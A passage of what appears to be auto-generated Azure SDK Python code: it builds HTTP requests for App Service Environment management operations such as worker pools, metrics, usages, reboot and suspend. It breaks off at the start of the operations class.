headers=_headers,
**kwargs
)
def build_get_multi_role_pool_request(
resource_group_name: str,
name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_create_or_update_multi_role_pool_request_initial(
resource_group_name: str,
name: str,
subscription_id: str,
*,
json: Optional[_models.WorkerPoolResource] = None,
content: Any = None,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', None)) # type: Optional[str]
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
if content_type is not None:
_headers['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="PUT",
url=_url,
params=_params,
headers=_headers,
json=json,
content=content,
**kwargs
)
def build_update_multi_role_pool_request(
resource_group_name: str,
name: str,
subscription_id: str,
*,
json: Optional[_models.WorkerPoolResource] = None,
content: Any = None,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', None)) # type: Optional[str]
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
if content_type is not None:
_headers['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="PATCH",
url=_url,
params=_params,
headers=_headers,
json=json,
content=content,
**kwargs
)
def build_list_multi_role_pool_instance_metric_definitions_request(
resource_group_name: str,
name: str,
instance: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default/instances/{instance}/metricdefinitions") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"instance": _SERIALIZER.url("instance", instance, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_list_multi_role_metric_definitions_request(
resource_group_name: str,
name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default/metricdefinitions") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_list_multi_role_pool_skus_request(
resource_group_name: str,
name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default/skus") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_list_multi_role_usages_request(
resource_group_name: str,
name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default/usages") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_list_operations_request(
resource_group_name: str,
name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/operations") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_get_outbound_network_dependencies_endpoints_request(
resource_group_name: str,
name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/outboundNetworkDependenciesEndpoints") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_reboot_request(
resource_group_name: str,
name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/reboot") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_resume_request_initial(
resource_group_name: str,
name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/resume") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_list_app_service_plans_request(
resource_group_name: str,
name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/serverfarms") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_list_web_apps_request(
resource_group_name: str,
name: str,
subscription_id: str,
*,
properties_to_include: Optional[str] = None,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/sites") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
if properties_to_include is not None:
_params['propertiesToInclude'] = _SERIALIZER.query("properties_to_include", properties_to_include, 'str')
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_suspend_request_initial(
resource_group_name: str,
name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/suspend") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_list_usages_request(
resource_group_name: str,
name: str,
subscription_id: str,
*,
filter: Optional[str] = None,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/usages") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
if filter is not None:
_params['$filter'] = _SERIALIZER.query("filter", filter, 'str', skip_quote=True)
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_list_worker_pools_request(
resource_group_name: str,
name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_get_worker_pool_request(
resource_group_name: str,
name: str,
worker_pool_name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"workerPoolName": _SERIALIZER.url("worker_pool_name", worker_pool_name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_create_or_update_worker_pool_request_initial(
resource_group_name: str,
name: str,
worker_pool_name: str,
subscription_id: str,
*,
json: Optional[_models.WorkerPoolResource] = None,
content: Any = None,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', None)) # type: Optional[str]
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"workerPoolName": _SERIALIZER.url("worker_pool_name", worker_pool_name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
if content_type is not None:
_headers['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="PUT",
url=_url,
params=_params,
headers=_headers,
json=json,
content=content,
**kwargs
)
def build_update_worker_pool_request(
resource_group_name: str,
name: str,
worker_pool_name: str,
subscription_id: str,
*,
json: Optional[_models.WorkerPoolResource] = None,
content: Any = None,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', None)) # type: Optional[str]
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"workerPoolName": _SERIALIZER.url("worker_pool_name", worker_pool_name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
if content_type is not None:
_headers['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="PATCH",
url=_url,
params=_params,
headers=_headers,
json=json,
content=content,
**kwargs
)
def build_list_worker_pool_instance_metric_definitions_request(
resource_group_name: str,
name: str,
worker_pool_name: str,
instance: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}/instances/{instance}/metricdefinitions") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"workerPoolName": _SERIALIZER.url("worker_pool_name", worker_pool_name, 'str'),
"instance": _SERIALIZER.url("instance", instance, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_list_web_worker_metric_definitions_request(
resource_group_name: str,
name: str,
worker_pool_name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}/metricdefinitions") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"workerPoolName": _SERIALIZER.url("worker_pool_name", worker_pool_name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_list_worker_pool_skus_request(
resource_group_name: str,
name: str,
worker_pool_name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}/skus") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"workerPoolName": _SERIALIZER.url("worker_pool_name", worker_pool_name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_list_web_worker_usages_request(
resource_group_name: str,
name: str,
worker_pool_name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/workerPools/{workerPoolName}/usages") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"workerPoolName": _SERIALIZER.url("worker_pool_name", worker_pool_name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
class AppServiceEnvironmentsOperations: # pylint: disable=too-many-public-methods
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.web.v2019_08_01.WebSiteManagementClient`'s
:attr:`app_service_environments` attribute.
"""
models = _models
def __init__(self, *args, **kwargs):
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace
def list(
self,
**kwargs: Any
) -> Iterable[_models.AppServiceEnvironmentCollection]:
"""Get all App Service Environments for a subscription.
Get all App Service Environments for a subscription.
